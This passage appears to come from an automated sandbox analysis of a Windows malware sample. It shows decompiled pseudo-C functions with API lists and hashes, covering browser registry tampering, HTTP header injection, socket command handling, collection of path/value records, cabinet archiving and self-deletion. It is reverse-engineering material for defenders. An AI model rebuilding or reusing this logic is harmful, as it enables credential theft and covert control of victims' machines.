        															_t38 = _t158 + 0x4141fb; // 0x407e1201
        															_t116 =  *_t38;
        															_t136 = _v12;
        															_t145 = 0;
        															_v36 = _v12;
        															_v16 = 0;
        															__eflags = _t116;
        															if(_t116 > 0) {
        																_t145 = E0040A332(_t136,  &_v16, _t135,  &_v36, _t116 & 0x000000ff);
        															}
        															_t44 = _t158 + 0x4141fa; // 0x7e120101
        															__eflags = _t145 - ( *_t44 & 0x000000ff);
        															if(_t145 >= ( *_t44 & 0x000000ff)) {
        																_t48 = _t158 + 0x4141f8; // 0x1010042
        																_t122 =  *((intOrPtr*)(_t158 + 0x4141fc))( *_t48 & 0x0000ffff, _v16, _t145, _v36, _t135 - _v12 + 1);
        																__eflags = _t122;
        																if(_t122 == 0) {
        																	_v5 = 4;
        																}
        															} else {
        																_v5 = 2;
        															}
        															E0040F17A(_t145, _v16);
        														} else {
        															_v6 = 4;
        														}
        													} else {
        														_v6 = 3;
        													}
        												} else {
        													_v6 = 2;
        												}
        											} else {
        												_v6 = 1;
        											}
        											break;
        										}
        										_v7 = _v7 + 1;
        									} while (_v7 < 0x19);
        									_t143 = _v40;
        									if(_v7 == 0x19) {
        										_v5 = 1;
        									}
        									goto L32;
        								}
        							}
        							while(_t135 < _t143) {
        								_t135 = _t135 + 1;
        								if( *_t135 != 0xa) {
        									continue;
        								}
        								goto L10;
        							}
        							goto L10;
        						}
        						goto L37;
        						L43:
        						_t138 = _a4;
        						_t91 = E004123F4(_v28, _a4);
        						_v28 = _t91;
        					} while (_t91 != 0);
        					if(_v6 != 2) {
        						__eflags = _v6 - 3;
        						if(_v6 != 3) {
        							__eflags = _v6 - 4;
        							if(_v6 != 4) {
        								goto L51;
        							}
        							_push(0);
        							L50:
        							E0040B938();
        							goto L51;
        						}
        						_push(1);
        						goto L50;
        					}
        					E0040B712();
        					goto L51;
        				}
        			}


        APIs
        • RtlEnterCriticalSection.NTDLL(ssLongW), ref: 0040832D
        • RtlLeaveCriticalSection.NTDLL(ssLongW), ref: 004085C2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave
        • String ID: atorA$ssLongW
        • API String ID: 3168844106-1301449656
        • Opcode ID: f3d30e2d2f332c451886a2572531a256ce274e111580325403cc20487b57ab88
        • Instruction ID: 0c4826fa70bf49913667b6bb5ca71c6b394a18235a6cd4e07e92472ac3393a73
        • Opcode Fuzzy Hash: f3d30e2d2f332c451886a2572531a256ce274e111580325403cc20487b57ab88
        • Instruction Fuzzy Hash: BD81F470D04259AADF21DBA4CA41BEEBBB4AF51304F14407FE980B72C2DB7C5946876D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040D772(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a16, intOrPtr _a20) {
        				signed int _v8;
        				signed int _v12;
        				intOrPtr _v16;
        				struct _SYSTEMTIME _v32;
        				char _v48;
        				void* __ebx;
        				void* __esi;
        				intOrPtr _t71;
        				signed int _t74;
        				signed int _t78;
        				signed int _t84;
        				signed int _t85;
        				signed short _t89;
        				signed int _t90;
        				intOrPtr _t93;
        				void* _t108;
        				signed int* _t123;
        				void* _t129;
        				void* _t131;
        				intOrPtr* _t135;
        				intOrPtr _t136;
        				signed int _t137;
        
        				_t129 = __edx;
        				_t126 = __ecx;
        				_t119 = L"Enabled";
        				if(E004121FF(__ecx, 0x80000001, L"Enabled") != 0) {
        					E00412241(__ecx, 0x80000001, L"Enabled");
        				}
        				_t130 = L"EnabledV8";
        				if(E004121FF(_t126, 0x80000001, L"EnabledV8") != 0) {
        					E00412241(_t126, 0x80000001, L"EnabledV8");
        				}
        				if(E004121FF(_t126, 0x80000002, _t119) != 0) {
        					E00412241(_t126, 0x80000002, _t119);
        				}
        				if(E004121FF(_t126, 0x80000002, _t130) != 0) {
        					E00412241(_t126, 0x80000002, _t130);
        				}
        				_t71 = _a20;
        				_t128 = ( *(_t71 + 4) & 0x0000ffff) + _t71;
        				_v16 = ( *(_t71 + 4) & 0x0000ffff) + _t71;
        				if(( *(_t71 + 2) & 0x00000080) == 0) {
        					L14:
        					_v8 = _v8 & 0x00000000;
        					_v12 = _v12 | 0xffffffff;
        					_t74 = E004124A2( &_v8, _t129, __eflags, _a4, _a8 + 1, 0x80000000);
        					_a8 = _t74;
        					__eflags = _t74;
        					if(_t74 == 0) {
        						L35:
        						E0040F15E(_a8);
        						L36:
        						return _v12;
        					}
        					__eflags = _v8 - 0x12;
        					if(_v8 < 0x12) {
        						goto L35;
        					}
        					_t134 =  *(_a16 + 0x420);
        					_t78 = E0040CC82( *(_a16 + 0x420));
        					__eflags = _t78 - 0xffffffff;
        					if(_t78 != 0xffffffff) {
        						L18:
        						_t131 = _t78 * 0x30 +  *0x414f5c;
        						_t30 = _t131 + 0x24; // -4280120
        						_t135 = _t30;
        						_t84 = E0040F0F6(( *(_t131 + 0x28) + 1) * 0x18, _t135);
        						__eflags = _t84;
        						if(_t84 == 0) {
        							goto L35;
        						}
        						_t85 =  *(_t131 + 0x28);
        						_t123 = _t85 * 0x18 +  *_t135;
        						_t136 = _a20;
        						 *(_t131 + 0x28) = _t85 + 1;
        						_t123[1] = _a8;
        						_t123[2] = _v8;
        						_t89 =  *(_t136 + 0xc) & 0x0000ffff;
        						__eflags = _t89;
        						if(_t89 != 0) {
        							_t100 = (_t89 & 0x0000ffff) + _t136;
        							__eflags = (_t89 & 0x0000ffff) + _t136 | 0xffffffff;
        							_t123[5] = E0040F346((_t89 & 0x0000ffff) + _t136 | 0xffffffff, _t100);
        						}
        						_t90 =  *(_t136 + 0xa) & 0x0000ffff;
        						__eflags = _t90;
        						if(_t90 != 0) {
        							_t97 = (_t90 & 0x0000ffff) + _t136;
        							__eflags = (_t90 & 0x0000ffff) + _t136 | 0xffffffff;
        							_t90 = E0040F346((_t90 & 0x0000ffff) + _t136 | 0xffffffff, _t97);
        							_t123[3] = _t90;
        						}
        						__eflags = _t123[3];
        						if(_t123[3] != 0) {
        							L25:
        							__eflags = _t90 | 0xffffffff;
        							_t123[4] = E0040F346(_t90 | 0xffffffff, _v16);
        							goto L26;
        						} else {
        							__eflags =  *(_t136 + 2) & 0x00000080;
        							if(( *(_t136 + 2) & 0x00000080) == 0) {
        								L26:
        								__eflags =  *(_t136 + 2) & 0x00000010;
        								if(( *(_t136 + 2) & 0x00000010) != 0) {
        									 *_t123 =  *_t123 | 0x00000001;
        									__eflags =  *_t123;
        								}
        								__eflags =  *(_t136 + 2) & 0x00000020;
        								if(( *(_t136 + 2) & 0x00000020) != 0) {
        									 *_t123 =  *_t123 | 0x00000002;
        									__eflags =  *_t123;
        								}
        								__eflags =  *(_t136 + 2) & 0x00000040;
        								if(( *(_t136 + 2) & 0x00000040) != 0) {
        									 *_t123 =  *_t123 | 0x00000004;
        									__eflags =  *_t123;
        								}
        								__eflags =  *(_t136 + 2) & 0x00000080;
        								if(( *(_t136 + 2) & 0x00000080) != 0) {
        									 *_t123 =  *_t123 | 0x00000008;
        									__eflags =  *_t123;
        								}
        								_t93 =  *0x414ad4; // 0x241f5a8
        								HttpAddRequestHeadersA( *(_a16 + 0x420),  *(_t93 + 0x15c), 0xffffffff, 0x80000000);
        								_v12 = _v12 & 0x00000000;
        								goto L36;
        							}
        							goto L25;
        						}
        					}
        					_t78 = E0040CCAB(1, _t134);
        					__eflags = _t78 - 0xffffffff;
        					if(_t78 == 0xffffffff) {
        						goto L35;
        					}
        					goto L18;
        				} else {
        					E004101CA( &_v48, _t128, E0040F637(_t128));
        					_v8 = _v8 & 0x00000000;
        					_t108 = E004089BF( &_v8, _t128, 0,  &_v48);
        					_t137 = _v8;
        					if(_t108 != 0x10) {
        						L13:
        						E0040F15E(_t137);
        						goto L14;
        					}
        					GetSystemTime( &_v32);
        					if( *((intOrPtr*)(_t137 + 6)) != _v32.wDay ||  *((intOrPtr*)(_t137 + 2)) != _v32.wMonth) {
        						goto L13;
        					} else {
        						return E0040F15E(_t137) | 0xffffffff;
        					}
        				}
        			}


        APIs
        • HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0040D968
        • GetSystemTime.KERNEL32(?,00000000,?,?,?,00000000,80000002,EnabledV8,80000002,Enabled,80000001,EnabledV8,80000001,Enabled), ref: 0040D817
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: FreeHeadersHeapHttpRequestSystemTime
        • String ID: Enabled$EnabledV8
        • API String ID: 2915018814-2402240967
        • Opcode ID: 06a09a679a59eaddef1519b1422e812069dbf1efc018237c8da0100a9ccb550d
        • Instruction ID: e448188ead35d7000306d65881eb1266b53c15934b2c9a1f0b92472dce2de565
        • Opcode Fuzzy Hash: 06a09a679a59eaddef1519b1422e812069dbf1efc018237c8da0100a9ccb550d
        • Instruction Fuzzy Hash: 4451D671900205AADB20EFA5CD46BAF7BF4AF05324F04827AF864F62D1D738D949C768
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 47%
        			E004092A5(intOrPtr _a4) {
        				char _v76;
        				char _v80;
        				char _v84;
        				intOrPtr _v88;
        				void* _v92;
        				char _v96;
        				intOrPtr _v108;
        				intOrPtr _v112;
        				char _v124;
        				intOrPtr _v140;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t51;
        				intOrPtr _t52;
        				intOrPtr _t55;
        				void* _t68;
        				void* _t81;
        				intOrPtr* _t84;
        				intOrPtr _t90;
        				intOrPtr* _t93;
        
        				_t90 = _a4;
        				_push(0x2710);
        				_t81 = 4;
        				_push(_t81);
        				_push( &_v84);
        				if(E0041059E(_t90) != _t81 || E0041059E(_t90,  &_v96, _t81, 0x2710) != _t81) {
        					L31:
        					return E00410970(_a4);
        				} else {
        					_t51 = _v96;
        					if(_t51 > 0xffff || _t51 == 0) {
        						goto L31;
        					} else {
        						_t52 = E0040F14B(_t51);
        						_v88 = _t52;
        						if(_t52 == 0) {
        							goto L31;
        						}
        						if(E0041059E(_t90, _t52, _v96, 0x2710) != _v108) {
        							L30:
        							E0040F15E(_v88);
        							goto L31;
        						}
        						if(_v84 == 0xa) {
        							_t55 =  *0x414ad4; // 0x241f5a8
        							_v80 = 0x32;
        							_v92 = E0040F2C5( *((intOrPtr*)(_t55 + 0x70)));
        							if(_v96 >= _t81) {
        								_t87 = _v88;
        								E0040F19A( &_v80, _v88, _t81);
        								_t75 = _v108;
        								if(_v108 > _t81) {
        									_v96 = E0040F5EA(_t75 + 0xfffffffc, _t87 + 4);
        								}
        							}
        							if(_v92 == 0) {
        								goto L30;
        							} else {
        								_t93 = E00408DDB(_v92, _v80, 0);
        								_v92 = _t93;
        								if(_t93 == 0) {
        									L29:
        									E0040F15E(_v92);
        									goto L30;
        								}
        								_push(1);
        								_push( &_v76);
        								_push(_t93);
        								if( *((intOrPtr*)( *_t93 + 0x30))() != 0) {
        									L28:
        									 *((intOrPtr*)( *_t93 + 8))(_t93);
        									goto L29;
        								}
        								_v76 = 0x1000;
        								 *0x414cac(_a4,  &_v80, 8, 0);
        								_t65 = _v92;
        								if(_v92 == 0) {
        									goto L28;
        								}
        								_t84 = E0040F14B(_t65);
        								if(_t84 == 0) {
        									goto L28;
        								}
        								while(1) {
        									_t68 =  *((intOrPtr*)( *_t93 + 0xc))(_t93, _t84, _v92,  &_v124);
        									if(_t68 != 0 || _v140 == _t68) {
        										break;
        									}
        									_push(_t68);
        									_push(_v140);
        									_push(_t84);
        									_push(_a4);
        									if( *0x414cac() == 0xffffffff) {
        										break;
        									}
        									if(E0041059E(_a4, _t84, 4, 0x2710) != 4 ||  *_t84 != _v124) {
        										_t93 = _v140;
        										break;
        									} else {
        										_t93 = _v140;
        										continue;
        									}
        								}
        								E0040F15E(_t84);
        								goto L28;
        							}
        						}
        						if(_v84 == 0x14 && _v96 >= _t81) {
        							_push(0);
        							_push(_v96);
        							_push(_v88);
        							_push(_t90);
        							if( *0x414cac() == _v112) {
        								E0040B712();
        							}
        						}
        						goto L30;
        					}
        				}
        			}

        APIs
          • Part of subcall function 0041059E: select.WS2_32(00000000,?,00000000,00000000,00002710), ref: 004105EE
          • Part of subcall function 0041059E: recv.WS2_32(?,?,?,00000000), ref: 00410606
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • send.WS2_32(?,00002710,00002710,00000000), ref: 00409348
          • Part of subcall function 0040B712: GetCurrentThread.KERNEL32 ref: 0040B715
          • Part of subcall function 0040B712: SetThreadPriority.KERNEL32(00000000,?,0040859C), ref: 0040B71C
          • Part of subcall function 0040B712: SHDeleteKeyA.SHLWAPI(80000001,?,?,0040859C), ref: 0040B72F
          • Part of subcall function 0040B712: SHDeleteKeyA.SHLWAPI(80000002,?,?,0040859C), ref: 0040B743
          • Part of subcall function 0040B712: SHDeleteKeyA.SHLWAPI(80000002,?,?,0040859C), ref: 0040B752
          • Part of subcall function 0040B712: Sleep.KERNEL32(000003E8,?,0040859C), ref: 0040B75D
        • send.WS2_32(?,00000000,00000008,00000000), ref: 004093F9
        • send.WS2_32(?,00000000,00002710,00000000), ref: 0040943B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Deletesend$Thread$AllocateCurrentHeapPrioritySleeprecvselect
        • String ID: 2
        • API String ID: 4172955902-450215437
        • Opcode ID: d654dc977708f2c1f062f643f485e7d19027d332a26d356901065599a686bace
        • Instruction ID: bfd2ccd8cf0cb0a2fe6fa2df37bd6dc1d313e2b78ebff444cccbcceaac3556da
        • Opcode Fuzzy Hash: d654dc977708f2c1f062f643f485e7d19027d332a26d356901065599a686bace
        • Instruction Fuzzy Hash: C1518E71508301AFCB10EF61C88496FB7A9EF84314F14893FF594A6292D778DD4ACB6A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 97%
        			E00404D44(void* __ecx, void* __eflags, intOrPtr _a4) {
        				signed int _v12;
        				signed int _v16;
        				signed int _v20;
        				char _v24;
        				intOrPtr _v28;
        				intOrPtr _v32;
        				intOrPtr _v36;
        				intOrPtr _v48;
        				char _v52;
        				char _v2104;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t47;
        				intOrPtr _t53;
        				intOrPtr _t54;
        				signed int _t69;
        				signed int _t71;
        				signed int _t76;
        				intOrPtr _t79;
        				intOrPtr* _t86;
        				void* _t87;
        
        				_v12 = 0;
        				if(E0040FF5C(0, __ecx,  &_v52, _a4) != 0) {
        					_v24 = 0;
        					_t47 = E0040A6D2(_v48, _v52,  &_v24);
        					_v32 = _t47;
        					if(_t47 != 0) {
        						asm("sbb ebx, ebx");
        						_t76 = _v24 - 9;
        						_t71 =  !_t69 & _t76;
        						_v16 = 0;
        						_v20 = 0;
        						if(_t71 > 0) {
        							_t13 = _t47 + 4; // 0x4
        							_t86 = _t13;
        							while(1) {
        								_t79 =  *((intOrPtr*)(_t86 - 4));
        								_v36 = _t79;
        								if(_t79 == 0) {
        									break;
        								}
        								_t53 =  *_t86;
        								_v28 = _t53;
        								if(_t53 == 0) {
        									break;
        								} else {
        									_t54 =  *((intOrPtr*)(_t86 + 4));
        									_a4 = _t54;
        									if(_t54 == 0) {
        										break;
        									} else {
        										E0040F383(_t79);
        										E0040F383(_v28);
        										_t81 = _a4;
        										E0040F383(_a4);
        										if(_v16 == 0) {
        											L9:
        											wnsprintfA( &_v2104, 0x7ff, "\nPath: %s\n", _a4);
        											_t87 = _t87 + 0x10;
        											if(E0040A673( &_v12,  &_v2104, 1) == 0) {
        												goto L14;
        											} else {
        												goto L10;
        											}
        										} else {
        											_t76 = _t76 | 0xffffffff;
        											if(E0040F65D(_t76, _t81, _t76, _v16) == 0) {
        												L10:
        												wnsprintfA( &_v2104, 0x7ff, "%s=%s\n", _v36,  *_t86);
        												_t87 = _t87 + 0x14;
        												if(E0040A673( &_v12,  &_v2104, 1) == 0) {
        													L14:
        													_v12 = _v12 & 0x00000000;
        												} else {
        													_v20 = _v20 + 9;
        													_t86 = _t86 + 0x24;
        													_v16 = _a4;
        													if(_v20 < _t71) {
        														continue;
        													} else {
        													}
        												}
        											} else {
        												goto L9;
        											}
        										}
        									}
        								}
        								goto L15;
        							}
        							E0040F15E(_v12);
        							goto L14;
        						}
        						L15:
        						E0040F17A(_v24, _v32);
        					}
        					E00410015( &_v52);
        				}
        				return _v12;
        			}

        APIs
          • Part of subcall function 0040FF5C: CreateFileW.KERNEL32(?,00000000,?,00000000,00000003,00000000,00000000,00000000,00417FD6,?,?,?,004041FB,00414540,?,00000006), ref: 0040FF88
          • Part of subcall function 0040FF5C: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004041FB,00414540,?,00000006,00000000,00000000,00000000,00000000), ref: 0040FF9B
        • wnsprintfA.SHLWAPI ref: 00404E0F
        • wnsprintfA.SHLWAPI ref: 00404E43
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Filewnsprintf$CreateSize
        • String ID: Path: %s$%s=%s
        • API String ID: 2143265763-3969205073
        • Opcode ID: bd5e16c6728f13eb504174be7855153b3b0a7f0c311cc07aa7e120a653533953
        • Instruction ID: 52418920f6c7bdf9688d5a3e59d72625e1dba354520646ec29fb1432e16de50d
        • Opcode Fuzzy Hash: bd5e16c6728f13eb504174be7855153b3b0a7f0c311cc07aa7e120a653533953
        • Instruction Fuzzy Hash: 2F418EB1D00209ABCF10EF95C841AEEB7B5BF84318F14443AEA44B72D1DB79AA45CBD4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 84%
        			E00404412(void* __ecx, void* __edx, long _a4) {
        				intOrPtr _v40;
        				void* _v48;
        				char _v56;
        				char _v64;
        				char _v68;
        				char _v72;
        				char _v73;
        				intOrPtr _v76;
        				intOrPtr _v77;
        				intOrPtr _v84;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				long _t28;
        				intOrPtr _t29;
        				void* _t34;
        				intOrPtr _t35;
        				long _t39;
        				long _t43;
        				long _t47;
        				long _t50;
        				long _t60;
        				void* _t61;
        				void* _t64;
        				void* _t65;
        				void* _t69;
        				long _t73;
        
        				_t64 = __edx;
        				_t61 = __ecx;
        				 *0x414ed8("mID", _t65, _t69, _t57);
        				_t28 = _a4;
        				_v73 = 0;
        				if(_t28 == 0) {
        					_t29 =  *0x414b7c; // 0x418000
        					_t4 = _t29 + 0x24; // 0x1a001e
        					_t57 =  *_t4 & 0x000000ff;
        					__eflags = _t29 + 0x12c;
        					E0040ABE5( &_v72,  *_t4 & 0x000000ff, _t69, _t29 + 0x12c);
        				} else {
        					_v72 = _t28;
        				}
        				E00412C5E( &_v56);
        				_t34 =  *0x414a30; // 0x2210041
        				_v48 = _t34;
        				_t35 = _v72;
        				_v40 = _t35;
        				_t78 = _t35;
        				if(_t35 == 0 || E0040FD42(_t57,  &_v56, _t78,  &_v64) == 0 || E0040423A(_t64,  &_v64, 0 | _a4 != 0x00000000) == 0) {
        					__eflags = _a4;
        					if(_a4 == 0) {
        						_t39 = E00404196(_t61);
        						_t72 = _t39;
        						__eflags = _t39;
        						if(__eflags != 0) {
        							_t60 = E004124A2( &_v68, _t64, __eflags, _t72, 0x4e24, 0x20000000);
        							E0040F15E(_t72);
        							_t43 = E0040F94A(_t60, _v84);
        							__eflags = _t43;
        							if(_t43 != 0) {
        								_t73 = _t60;
        								while(1) {
        									__eflags = WaitForSingleObject( *0x414a30, 0x2710);
        									if(__eflags == 0) {
        										goto L17;
        									}
        									_v40 = _t73;
        									_t47 = E0040FD42(_t60,  &_v56, __eflags,  &_v64);
        									__eflags = _t47;
        									if(_t47 == 0) {
        										L14:
        										_t73 = E0040F968(_t73, 1);
        										__eflags = _t73;
        										if(_t73 != 0) {
        											continue;
        										} else {
        										}
        									} else {
        										_t50 = E0040423A(_t64,  &_v64, 0);
        										__eflags = _t50;
        										if(_t50 != 0) {
        											_v73 = 1;
        										} else {
        											goto L14;
        										}
        									}
        									goto L17;
        								}
        							}
        							L17:
        							E0040F15E(_t60);
        						}
        					}
        				} else {
        					_v73 = 1;
        				}
        				 *0x414edc("mID");
        				if(_a4 == 0) {
        					E0040F15E(_v76);
        				}
        				return _v77;
        			}

        APIs
        • RtlEnterCriticalSection.NTDLL(mID), ref: 00404423
        • RtlLeaveCriticalSection.NTDLL(mID), ref: 00404544
          • Part of subcall function 00404196: CreateMutexW.KERNEL32(004155B4,00000000,?), ref: 004041B1
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • WaitForSingleObject.KERNEL32(00002710,00000000,00000000,00004E24,20000000,00417ED4), ref: 004044F3
          • Part of subcall function 0040FD42: WaitForSingleObject.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000), ref: 0040FD96
          • Part of subcall function 0040FD42: InternetCloseHandle.WININET(00000000), ref: 0040FE2F
          • Part of subcall function 0040423A: CreateMutexW.KERNEL32(004155B4,00000000,?,00000000,00417FD6,?,?), ref: 004042AB
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CreateCriticalMutexObjectSectionSingleWait$CloseEnterFreeHandleHeapInternetLeave
        • String ID: mID
        • API String ID: 3353207558-4014272676
        • Opcode ID: 405419ec6c4936524efaccfe71464f11b98a665448003f078548e1c620c52568
        • Instruction ID: 7851451f523802d159a882c1bc48386f65d26c2afff41652ee24feabc8c54e0b
        • Opcode Fuzzy Hash: 405419ec6c4936524efaccfe71464f11b98a665448003f078548e1c620c52568
        • Instruction Fuzzy Hash: BC31C0B1504300ABC720EF21DC41B9B77D8AFC4759F00457BBA85B72C1D778DD1986AA
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 64%
        			E0040E13F(signed int __eax, void* __ecx, intOrPtr _a4, signed int _a8, signed int* _a12) {
        				intOrPtr _v8;
        				void* __esi;
        				intOrPtr _t29;
        				signed int _t31;
        				intOrPtr _t36;
        				signed int _t38;
        				signed char _t43;
        				intOrPtr _t48;
        				signed char* _t53;
        				signed int* _t58;
        
        				 *_a12 =  *_a12 & 0x00000000;
        				_t53 = __eax * 0x30 +  *0x414f5c;
        				_v8 = 1;
        				if(( *_t53 & 0x00000010) != 0) {
        					L8:
        					if(_v8 != 0) {
        						_t51 = _t53[0x20];
        						_t31 = _t53[0x1c] - _t53[0x20];
        						if(_t31 != 0) {
        							if(_a4 != 0 || _a8 != 0) {
        								_t48 = 0;
        							} else {
        								_t48 = 1;
        								_a8 = 0x1000;
        							}
        							if(_a8 < _t31) {
        								_t31 = _a8;
        							}
        							if(_t48 == 0) {
        								_t31 = E0040F19A(_a4, _t53[0x18] + _t51, _t31);
        								_t53[0x20] = _t53[0x20] + _t31;
        							}
        						}
        						 *_a12 = _t31;
        					}
        					L18:
        					_t29 = _v8;
        					L19:
        					return _t29;
        				}
        				_t43 = _t53[4];
        				_t58 = RtlAllocateHeap( *0x415fa8, 8, 0x48);
        				if(_t58 != 0) {
        					_t6 =  &(_t58[1]); // 0x4
        					E0040F19A(_t6, _t53, 0x30);
        					if(_a4 == 0 && _a8 == 0) {
        						 *_t58 =  *_t58 | 0xffffffff;
        					}
        					 *0x414edc(0x414f68);
        					_t36 = E0040D9AA(_t58);
        					_v8 = _t36;
        					 *0x414ed8(0x414f68);
        					_t38 = E0040CC82(_t43);
        					if(_t38 == 0xffffffff) {
        						goto L2;
        					}
        					_t53 = _t38 * 0x30 +  *0x414f5c;
        					if(( *_t53 & 0x00000010) == 0) {
        						goto L18;
        					}
        					goto L8;
        				}
        				L2:
        				_t29 = 0;
        				goto L19;
        			}

        APIs
        • RtlAllocateHeap.NTDLL(00000008,00000048), ref: 0040E170
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E1A4
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E1B4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$AllocateEnterHeapLeave
        • String ID: essAsUserA
        • API String ID: 414954722-2345198579
        • Opcode ID: b56dbb7ec633f5943a2945972a3f21f7421f2818b1153460ea0c8d4c20ae84df
        • Instruction ID: eddcef4b5af88f9e496c68c6daa2174a4fb794c7592dfd982aabc6cb7e46ed5f
        • Opcode Fuzzy Hash: b56dbb7ec633f5943a2945972a3f21f7421f2818b1153460ea0c8d4c20ae84df
        • Instruction Fuzzy Hash: F231C771500205EBDB248F65C844B9A77A8BF95315F108A7FE815AB3D0D778D961CB48
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 86%
        			E00411BE0() {
        				WCHAR* _v4;
        				void* _t25;
        				intOrPtr _t27;
        				WCHAR* _t33;
        				intOrPtr* _t35;
        
        				_t33 = 0;
        				if(E00411AF9() != 0) {
        					_t35 = RtlAllocateHeap( *0x415fa8, 8, 0x954);
        					if(_t35 == 0) {
        						L7:
        						E00411BBF();
        					} else {
        						_t2 = _t35 + 0x53e; // 0x53e
        						if(PathCombineW(_t2, _v4, 0) == 0) {
        							L6:
        							E0040F15E(_t35);
        							goto L7;
        						} else {
        							_t3 = _t35 + 0x746; // 0x746
        							if((GetTempPathW(0x103, _t3) & 0xffffff00 | _t21 > 0x00000000) == 0) {
        								goto L6;
        							} else {
        								 *((intOrPtr*)(_t35 + 0x14)) = 0x7fffffff;
        								_t7 = _t35 + 0x10; // 0x10
        								 *_t7 = 0x7fffffff;
        								 *((intOrPtr*)(_t35 + 0x24)) = 1;
        								 *((intOrPtr*)(_t35 + 0x28)) = 1;
        								_t10 = _t35 + 0x132; // 0x132
        								E0040F19A(_t10, "cabinet.dll", 0xc);
        								_t11 = _t35 + 0x232; // 0x232
        								_t25 = E0040F19A(_t11, "?O", 2);
        								_t12 = _t35 + 4; // 0x4
        								_t27 =  *0x415f98(_t12, E00411A65, E004117C0, E004117D3, E004117E6, E004118D2, E00411909, E0041194F, E00411970, E004119BA, E004119F4, _t25, _t35);
        								 *_t35 = _t27;
        								if(_t27 == 0) {
        									goto L6;
        								} else {
        									_t33 = _t35;
        								}
        							}
        						}
        					}
        				}
        				return _t33;
        			}

        APIs
          • Part of subcall function 00411AF9: LoadLibraryA.KERNEL32(cabinet.dll,00000001,00411BE8,00000000,00411EC2,00000001,00000001,00000000,?,00413656,?,?,00000001,?), ref: 00411B0D
          • Part of subcall function 00411AF9: GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00411B26
          • Part of subcall function 00411AF9: GetProcAddress.KERNEL32(FCIAddFile), ref: 00411B3C
          • Part of subcall function 00411AF9: GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00411B52
          • Part of subcall function 00411AF9: GetProcAddress.KERNEL32(FCIDestroy), ref: 00411B68
          • Part of subcall function 00411AF9: HeapCreate.KERNEL32(00000000,00080000,00000000,?,00413656,?,?,00000001,?), ref: 00411B96
          • Part of subcall function 00411AF9: FreeLibrary.KERNEL32(?,00413656,?,?,00000001,?), ref: 00411BAB
        • RtlAllocateHeap.NTDLL(00000008,00000954,00000001), ref: 00411BFE
        • PathCombineW.SHLWAPI(0000053E,?,00000000,?,00413656,?,?,00000001,?), ref: 00411C1A
        • GetTempPathW.KERNEL32(00000103,00000746,?,00413656,?,?,00000001,?), ref: 00411C34
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressProc$HeapLibraryPath$AllocateCombineCreateFreeLoadTemp
        • String ID: cabinet.dll
        • API String ID: 3318130981-741892446
        • Opcode ID: 9b5c2fb9af840bfb355cfb241e98ad864d9d7b80ae7d24e0aa142cfd724900dc
        • Instruction ID: 3711fc09653c1f1972bfb8e8c856ceb81a8af5b1b34e30448f1aae78df83ad9b
        • Opcode Fuzzy Hash: 9b5c2fb9af840bfb355cfb241e98ad864d9d7b80ae7d24e0aa142cfd724900dc
        • Instruction Fuzzy Hash: BE2101B0280701ABD6209B218C06FD73799AF40B04F10453FB766A67E0EABCD885CB9C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 54%
        			E00404BB0(void* __eax, void* __ecx, void* __eflags) {
        				char _v5;
        				signed int _v12;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				signed int _t16;
        				intOrPtr _t26;
        				intOrPtr _t27;
        				signed int _t29;
        				intOrPtr _t33;
        				void* _t36;
        				void* _t39;
        				signed int _t42;
        				signed int _t43;
        
        				_push(__ecx);
        				_push(__ecx);
        				_t29 = 0;
        				_v5 = 0;
        				_v12 = 0;
        				_t36 = E0040A332(__eax,  &_v12, __ecx + __eax, 0, 0x64);
        				if(_t36 != 0) {
        					 *0x414ed8("pVirtualKeyExA", _t39);
        					_t16 =  *0x414778; // 0x74537972
        					if(E0040F0F6(_t16 + _t36 << 2, 0x41477c) != 0 && _t36 > 0) {
        						do {
        							_t42 =  *0x414778; // 0x74537972
        							_t43 = _t42 << 2;
        							_t26 = E0040F5EA(_v12 | 0xffffffff,  *((intOrPtr*)(_v12 + _t29 * 4)));
        							_t33 =  *0x41477c; // 0x676e6972
        							 *((intOrPtr*)(_t43 + _t33)) = _t26;
